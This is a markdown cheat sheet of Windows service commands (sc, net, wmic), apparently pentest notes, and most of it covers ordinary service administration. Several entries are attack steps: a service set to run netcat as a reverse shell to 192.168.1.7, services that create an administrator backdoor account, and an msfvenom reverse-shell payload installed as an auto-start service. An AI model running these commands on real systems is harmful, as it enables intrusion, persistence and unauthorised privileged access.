Skip to content

Latest commit

 

History

History
219 lines (167 loc) · 3.88 KB

Service-Commands.md

File metadata and controls

219 lines (167 loc) · 3.88 KB

Service-Controller-Utility-Commands

Querying Services

Display Information About a Specified Service

sc query

Display Extended Information About a Service

sc queryex type= service

Display Services of Type 'Service'

sc query type= service

Find Specific Service States

sc query find "STATE"

Find a Specific Service by Name

sc query | find "Telnet"

Query a Specific Service

sc query LanmanServer

Service Configuration

Display the Configuration of a Service

sc qc Audiosrv

Stop a Service

sc stop Audiosrv

Start a Service

sc start Audiosrv

Pause a Service

sc pause Audiosrv

Resume a Paused Service

sc continue Audiosrv

Configure Service Startup and Login Accounts

sc config Audiosrv

Creating and Managing Services

Create a New Service

sc create nc binPath= "C:\Windows\System32\nc64.exe"

Query the Configuration of a Created Service

sc qc nc

Query the Status of a Created Service

sc query nc

Start the Created Service

sc start nc

Delete a Service

sc delete nc

Configure a Service to Run a Specific Command

sc config nc binPath= "C:\Windows\nc64.exe 192.168.1.7 4444 -e cmd.exe"

Create a Service to Send ICMP Packets

sc create pingme binPath= "ping 192.168.1.6"

Start the ICMP Service

sc start pingme

Create a User Creation Service

sc create useradd binPath="net user u1 password@123 /add"

Start the User Creation Service

sc start useradd

Configure a Service to Add a User to Administrators Group

sc config useradd binpath= "net localgroup administrators u1 /add"

Start the Privilege Elevation Service

sc start useradd

Exploitation Example

Generate a Reverse Shell Executable Using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.6 LPORT=4455 -f exe > shell.exe

Configure a Service to Execute the Shell

sc create msfvenom_shell binPath= "C:\Windows\Temp\shell.exe"

Change a Service's Startup Type

sc config msfvenom_shell start=auto
  • auto - Automatic Startup
  • demand - Manual Startup
  • disabled - Disabled

Restart the System Immediately

shutdown /r /t 0 /f

Service Management Using net

Start a Service Using net

net start TlntSvr

Stop a Service Using net

net stop TlntSvr

Pause a Service Using net

net pause TlntSvr

Resume a Paused Service Using net

net continue TlntSvr

Using wmic to Manage Services

List All Services with Details

wmic service get name, displayname, pathname, startmode

List All Auto-Start Services

wmic service get name, displayname, pathname, startmode | findstr /i "auto"

List All Auto-Start Services Excluding Those in C:\Windows

wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i/v "c:\windows"

Additional Resources

ServiceSecurityEditor

ServiceSecurityEditor is used to maintain and manage services, allowing manual configuration of permissions for users.

Download ServiceSecurityEditor

After Download

  1. Run the application.
  2. Select the service you want to configure.
  3. Click "Open".
  4. Add a user.
  5. Select the user and set the required permissions.
  6. Click "Apply" and then "OK".